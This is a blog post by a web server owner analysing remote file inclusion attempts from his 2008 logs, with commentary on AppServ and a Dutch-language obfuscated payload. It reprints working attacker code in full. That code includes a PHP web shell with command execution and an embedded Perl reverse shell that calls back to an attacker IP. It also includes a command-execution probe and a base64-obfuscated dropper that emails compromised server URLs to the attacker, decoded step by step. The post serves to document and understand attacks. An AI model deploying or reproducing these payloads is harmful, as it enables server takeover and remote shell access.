* endellion.me.uk


(Some Jerks are) Testing for Web Server Vulnerabilities

A lot of scripts are being let loose on the webserver at the moment. Here is a selection from the web logs..

(For a list of all recent attacks on the server go look here.)

 

1. AppServ

91.193.130.36 - - [28/Jan/2008:13:10:52 +0000] "GET /appserv/main.php?appserv_root=http://212.78.204.20/retiredgod/a.txt?& HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

A quick look at the webserver at 212.78.204.20 shows that the directory retiredgod contains two files: a.txt and t.txt. The below is a.txt. In other words, should customer at valueserver.de have had any success with the proxy request, this would have been the result. 

<title>Vulner4bl3</title>        
VulnerabLe

And with this success obtained, no doubt t.txt would have been let loose: (click here to skip to the end of this seriously long bit of code)

<?
error_reporting(0);
/* Loader'z WEB Shell v 0.1 {14 ????? 2005}
??? ?????? ?????? ???????. ??? ????? ?? ???????????? ???????.
- ?????? ? ???????? ???????? ? ???????? PHP. ? ??????? ??????? ???????????? ?????????? ??????? ????.
- ???????? ? ?????????????? ???????.
- ??????? ?????? ? ??????? ???????? ? ??????? HTTP.
- ??????? ?????? ? ?????? ????????? ?????.
- ?????????? ???????????? ?????? ??? ???????.
- ?????? ?????? ???????? ?????????? ??????????. ???????? ?? ??????? ??????? ?? ???? ???, ???? ??, ?? ?????? ??????? ?????????? ???????,
??? ????????, ? ??? ?? ????, ??? ?? ?????? ????????? ???????.
- ?????? ??????? ???????? ?? ???????????? ???? ???????.
- ???? ?????? ???????? ??? ??????????? ?? Windows, ?????? ?????????? ??? ?????????? ?????? ?????????????? ? win-1251.
- ???????????? ??????????? ?????? ????-????. ?? ?????? ??????? ???????? ????????? ? ???? ?? ??????? ????????? ??????.
Loader Pro-Hack.ru
*/
?>

<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0;
background-color: #336699 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #336699 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active {COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #DCE7EF;
SCROLLBAR-HIGHLIGHT-COLOR: #dbdbdb;
SCROLLBAR-SHADOW-COLOR: #598BB6;
SCROLLBAR-3DLIGHT-COLOR: #598BB6;
SCROLLBAR-ARROW-COLOR: #598BB6;
SCROLLBAR-TRACK-COLOR: #F4FAFD;
SCROLLBAR-DARKSHADOW-COLOR: #dbdbdb;
background-color: #336699;
}

 

fieldset.search { padding: 6px; line-height: 150% }

label { cursor: pointer }

form { display: inline }

img { vertical-align: middle; border: 0px }

img.attach { padding: 2px; border: 2px outset #000033 }

#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
#logo { FONT-SIZE: 50px; }
</style>

<title>ZETHA WEB SHELL </title>

<table "width="100%" height=100% bgcolor="#336699">
<tr><td align="center" valign="top">

<table><tr><td>
<?php

$dir = $_POST['dir'];
$dir = stripslashes($dir);

$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);

$bind = "
#!/usr/bin/perl
use Socket;
\$host = \$ARGV[0];
\$port = \$ARGV[1];
\$proto = getprotobyname('tcp') || die shit;
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die shit;
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
print shit;
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
exec {'/bin/sh'} '-bash' ;
exit(0);
}
";
function decode($buffer){

return convert_cyr_string ($buffer, d, w);

}

 

/*??????????*/

/*????????? ??? ???????*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];

if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}

 

echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";

if ($sertype == "winda"){

ob_start('decode');
echo "Version: ";
echo passthru("ver") . "<br><br>";
ob_end_flush();
}

if ($sertype == "other"){
echo "id:";
echo passthru("id") . "<br>";
echo "uname:";
echo passthru("uname -a") . "<br><br>";
echo "uptime:";
echo passthru("uptime") . "<br><br>";
}

 

if($_POST['post'] == "yes" and $HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}

if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))

{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}

if ($_POST['installbind']){

if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}

$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);

exec("perl $installpath $ip $cbport");
chdir($dir);

}

if ($_POST['editfile']){
$fp = fopen($_POST['editfile'], "r");
$filearr = file($_POST['editfile']);

foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}

echo "<center><div id=logostrip>Edit file: $editfile </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=122
rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\"></form></center>";
fclose($fp);
}

if($_POST['savefile']){

$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";

}

if ($cmd){

echo "<center><textarea cols=122 rows=20>";
if($sertype == "winda"){
ob_start('decode');
passthru($cmd);
ob_end_flush();}
else{
passthru($cmd);
}

echo "</textarea></center>";

}else{
$arr = array();

$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td>Type</td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td>Write</td><td>Read</td></tr>";

foreach ($arr as $filename) {

if ($filename != "." and $filename != ".."){

if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) .
"</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";

}

if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}

if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M
Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}

if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}

 

}

 

}
echo $dires;
echo $files;
echo "</table><br>";
}

 

echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">

Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";

echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\"></form>";

 

if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
Including from here: "
. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}

 

 

 

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<INPUT type=\"file\" name=\"userfile\">
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";

 

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
Install cb
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
<b>Ip</b><input type=\"text\" name=\"ip\" value=\"ip\">
<b>Port</b><input type=\"text\" name=\"cbport\" value=\"3333\">

<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\"></form></div>";

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";

 

?>
</td></tr></table>

</td></tr>
<tr valign="BOTTOM">
<td valign=bottom><center>
Coded by Loader and Modify By Zetha
</center></td>
</tr>
</table>

pro-hack.ru huh? The application this is targeting has an /appserv/ directory which contains a vulnerable php script by the looks of it. My thinking here is this might be related to AppServ...

From the website: ( http://www.appservnetwork.com/modules.php?name=Content&pa=showpage&pid=7 )

AppServ the begining.
AppServ is not support by Thai Goverment or Corporation but this program was inspire by Phanupong Panyadee (AppServ Foundation). Concept of AppServ it is Easy to install Apache, PHP, MySQL in 1 minute. Many people in this world have problem when Install Apache, PHP, MySQL becuase use long time to configure and some time can make dizzy. First time of distribution provide on October 9, 2001. Many people use AppServ and growing up everywhere in this world. Right now AppServ website provide in Thai and English language. For the future AppServ wet site will provide every languages on world.

My first language isn't English either, but this made me laugh a little. I want to go to the planet where people don't have any problem when install Apache. Bit of weirdness there as well: whilst they recommend linux, the only download I can find is a windows executable. Oh well. Maybe because you don't need this thing on linux?

"Solution: Currently, there are no known upgrades, patches, or workarounds available to correct this issue."

(source: http://osvdb.org/22228 )

That's just brilliant. I am tempted to set this thing up to see what they would want to do given such access levels, but that would mean major reorganisation which I haven't got the time for at the moment.

Hang on, it just struck me that there must be a solution... The vulnerability is exploited within the /appserv/ directory, but it says on the AppServ website you can delete that after installation. Maybe that would help?

Directory structure of www file store.
• www Directory Root for Web page file.
• www/cgi-bin CGI file directory.
• www/phpMyAdmin phpMyAdmin program directory.
• www/appserv AppServ file, you can delete it after install.
• www/index.php AppServ index.php file you can delete it after install.

 

2. php redirection/code injection/whatever this is


72.55.143.52 - - [28/Jan/2008:11:59:52 +0000] "GET /index.php?page=http://www.pooya.info/images/.../test.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"

Here we have some random php vulnerability. This scheme is being tried in random directories on my server. All of them attempt to retrieve test.txt which reads: (and it's nowhere near as big as the last one)

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

A quick peek at the pooya.info server shows the same directory has another file called response.txt:

<?php $_F=__FILE__;$_X='Pz48aHRtbD48aDUxZD48dDR0bDU+L1wvXC9cIFI1c3AybnM1IENNRCAvXC9cL1w8L3Q0dGw
1PjwvaDUxZD48YjJkeSBiZ2MybDJyPURDNnVvQz4NCjxINj5DaDFuZzRuZyB0aDRzIENNRCB3NGxsIHI1czNsdCA0biBjMn
JyM3B0IHNjMW5uNG5nICE8L0g2Pg0KPC9odG1sPjwvaDUxZD48L2IyZHk+DQo8P3BocA0KNGYoKEA1cjVnNCgiMzRkIiw1e
CgiNGQiKSkpIHx8IChANXI1ZzQoIlc0bmQyd3MiLDV4KCJuNXQgc3QxcnQiKSkpKXsNCjVjaDIoIlMxZjUgTTJkNSAyZiB0
aDRzIFM1cnY1ciA0cyA6ICIpOw0KNWNoMigiUzFmNU9GRiIpOw0KfQ0KNWxzNXsNCjRuNF9yNXN0MnI1KCJzMWY1X20yZDU
iKTsNCjRuNF9yNXN0MnI1KCIycDVuX2IxczVkNHIiKTsNCjRmKChANXI1ZzQoIjM0ZCIsNXgoIjRkIikpKSB8fCAoQDVyNW
c0KCJXNG5kMndzIiw1eCgibjV0IHN0MXJ0IikpKSl7DQo1Y2gyKCJTMWY1IE0yZDUgMmYgdGg0cyBTNXJ2NXIgNHMgOiAiK
TsNCjVjaDIoIlMxZjVPRkYiKTsNCn01bHM1ew0KNWNoMigiUzFmNSBNMmQ1IDJmIHRoNHMgUzVydjVyIDRzIDogIik7DQo1
Y2gyKCJTMWY1T04iKTsNCn0NCn0NCi8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo
2MA0KJGZyMm0xZzUgPSAgIlA0dEIzbGwgQ3I1VyA8cDR0YjNsbGczeXNAMm5sNG41bTE0bC5jMm0+IjsvLzBvOTN1NDA5Nj
MwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiRqMTVudzQ1bTI1dGg1bWQxbjJudHYxbmc1bmg1I
D0gIjFkdjVudDNyNWNyMXp5ajFuQGdtMTRsLmMybSI7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlx
ZjNvajYwODlyajYwDQokNW53NWxrMm5kNXJ3NXJwbTI1dGg1dGg1YmI1biA9ICJTdDFibDVTYzFubjVyIjsvLzBvOTN1NDA
5NjMwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiQ1bm4xdDMzcmw0amttMjV0NW53NWQ1M3Jsbj
Q1dHY1cmc1dDVuID0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddO
y8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KJGg1dzVoNWJiNW4yMmtuMmc0
bmYyID0gIkZyMm06ICIuJGZyMm0xZzU7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODl
yajYwDQptMTRsKCRqMTVudzQ1bTI1dGg1bWQxbjJudHYxbmc1bmg1LCAkNW53NWxrMm5kNXJ3NXJwbTI1dGg1dGg1YmI1bi
wgJDVubjF0MzNybDRqa20yNXQ1bnc1ZDUzcmxuNDV0djVyZzV0NW4sICRoNXc1aDViYjVuMjJrbjJnNG5mMik7Ly8wbzkzd
TQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQovLzBvOTN1NDA5NjMwamY5NWoxMDk1Zjhv
MDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCmYzbmN0NDJuIDV4KCRjZjUpew0KJHI1cyA9ICcnOw0KNGYgKCE1bXB0eSg
kY2Y1KSl7DQo0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7DQpANXg1YygkY2Y1LCRyNXMpOw0KJHI1cyA9IGoyNG4oIl
xuIiwkcjVzKTsNCn0NCjVsczU0ZihmM25jdDQybl81eDRzdHMoJ3NoNWxsXzV4NWMnKSl7DQokcjVzID0gQHNoNWxsXzV4N
WMoJGNmNSk7DQp9DQo1bHM1NGYoZjNuY3Q0Mm5fNXg0c3RzKCdzeXN0NW0nKSl7DQpAMmJfc3QxcnQoKTsNCkBzeXN0NW0o
JGNmNSk7DQokcjVzID0gQDJiX2c1dF9jMm50NW50cygpOw0KQDJiXzVuZF9jbDUxbigpOw0KfQ0KNWxzNTRmKGYzbmN0NDJ
uXzV4NHN0cygncDFzc3RocjMnKSl7DQpAMmJfc3QxcnQoKTsNCkBwMXNzdGhyMygkY2Y1KTsNCiRyNXMgPSBAMmJfZzV0X2
MybnQ1bnRzKCk7DQpAMmJfNW5kX2NsNTFuKCk7DQp9DQo1bHM1NGYoQDRzX3I1czIzcmM1KCRmID0gQHAycDVuKCRjZjUsI
nIiKSkpew0KJHI1cyA9ICIiOw0Kd2g0bDUoIUBmNTJmKCRmKSkgeyAkcjVzIC49IEBmcjUxZCgkZiw2MGF1KTsgfQ0KQHBj
bDJzNSgkZik7DQp9DQp9DQpyNXQzcm4gJHI1czsNCn0NCjV4NHQ7';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZ
GUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19G
SUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

xx-small because it's a load of garble just taking up the space on the page. This is base64 encoded and gives:

?><html><h51d><t4tl5>/\/\/\ R5sp2ns5 CMD /\/\/\</t4tl5></h51d><b2dy bgc2l2r=DC6uoC>
<H6>Ch1ng4ng th4s CMD w4ll r5s3lt 4n c2rr3pt sc1nn4ng !</H6>
</html></h51d></b2dy>
<?php
4f((@5r5g4("34d",5x("4d"))) || (@5r5g4("W4nd2ws",5x("n5t st1rt")))){
5ch2("S1f5 M2d5 2f th4s S5rv5r 4s : ");
5ch2("S1f5OFF");
}
5ls5{
4n4_r5st2r5("s1f5_m2d5");
4n4_r5st2r5("2p5n_b1s5d4r");
4f((@5r5g4("34d",5x("4d"))) || (@5r5g4("W4nd2ws",5x("n5t st1rt")))){
5ch2("S1f5 M2d5 2f th4s S5rv5r 4s : ");
5ch2("S1f5OFF");
}5ls5{
5ch2("S1f5 M2d5 2f th4s S5rv5r 4s : ");
5ch2("S1f5ON");
}
}
//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$fr2m1g5 = "P4tB3ll Cr5W <p4tb3llg3ys@2nl4n5m14l.c2m>";//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$j15nw45m25th5md1n2ntv1ng5nh5 = "1dv5nt3r5cr1zyj1n@gm14l.c2m";//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$5nw5lk2nd5rw5rpm25th5th5bb5n = "St1bl5Sc1nn5r";//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$5nn1t33rl4jkm25t5nw5d53rln45tv5rg5t5n = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$h5w5h5bb5n22kn2g4nf2 = "Fr2m: ".$fr2m1g5;//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
m14l($j15nw45m25th5md1n2ntv1ng5nh5, $5nw5lk2nd5rw5rpm25th5th5bb5n, $5nn1t33rl4jkm25t5nw5d53rln45tv5rg5t5n, $h5w5h5bb5n22kn2g4nf2);//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
f3nct42n 5x($cf5){
$r5s = '';
4f (!5mpty($cf5)){
4f(f3nct42n_5x4sts('5x5c')){
@5x5c($cf5,$r5s);
$r5s = j24n("\n",$r5s);
}
5ls54f(f3nct42n_5x4sts('sh5ll_5x5c')){
$r5s = @sh5ll_5x5c($cf5);
}
5ls54f(f3nct42n_5x4sts('syst5m')){
@2b_st1rt();
@syst5m($cf5);
$r5s = @2b_g5t_c2nt5nts();
@2b_5nd_cl51n();
}
5ls54f(f3nct42n_5x4sts('p1ssthr3')){
@2b_st1rt();
@p1ssthr3($cf5);
$r5s = @2b_g5t_c2nt5nts();
@2b_5nd_cl51n();
}
5ls54f(@4s_r5s23rc5($f = @p2p5n($cf5,"r"))){
$r5s = "";
wh4l5(!@f52f($f)) { $r5s .= @fr51d($f,60au); }
@pcl2s5($f);
}
}
r5t3rn $r5s;
}
5x4t;

'$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

That's nearly legible, only the command in the last line left:

?><html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC6uoC>
<H6>Changing this CMD will result in corrupt scanning !</H6>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafeON");
}
}
//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
$fromage = "PitBull CreW <pitbullguys@onlinemail.com>";//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
$jaenwiemoethemdanontvangenhe = "adventurecrazyjan@gmail.com";//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
$enwelkonderwerpmoethethebben = "StableScanner";//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
$ennatuurlijkmoetenwedeurlnietvergeten = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
$hewehebbenooknoginfo = "From: ".$fromage;//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
mail($jaenwiemoethemdanontvangenhe, $enwelkonderwerpmoethethebben, $ennatuurlijkmoetenwedeurlnietvergeten, $hewehebbenooknoginfo);//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
//0o9uui096u0jf9eja09ef8o09607uiro08eyqfuoj6089rj60
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,60au); }
@pclose($f);
}
}
return $res;
}
exit;

Well there's some similarity with the "test.txt" but this one has some added bits, and they're in Dutch. This is quite good really as this happens to be my native tongue. It might have been Russian, Romanian or Rastafarian and I would not have known what it said. Approximately twice a year it comes in handy to know Dutch, and this is one of those times already used up for 2008... Hopefully adventurecrazyjan@gmail.com won't mind if I say that roughly translated

$jaenwiemoethemdanontvangenhe means "yes and who should receive it now huh"; $enwelkonderwerpmoethethebben means "and what subject should it have", $ennatuurlijkmoetenwedeurlnietvergeten means "and of course we must not forget the url" and last but not least $hewehebbenooknoginfo means "hey we also have some info". Wonderful, no? I am still left with strings of nonsense letters & numbers after the slashes, so I'm obviously not done yet. Unless these are just sequences of random nonsense aimed at obfuscation. After all, they're comments, so they don't get evaluated. Maybe I should mail this adventure-crazy jan and ask him?

Oh and credit where it's due: I did not use pencil and paper to decode the base64 stuff. A beautiful decoder can be found here: http://makcoder.sourceforge.net/demo/base64.php. This one didn't fall over once, unlike some others I tried...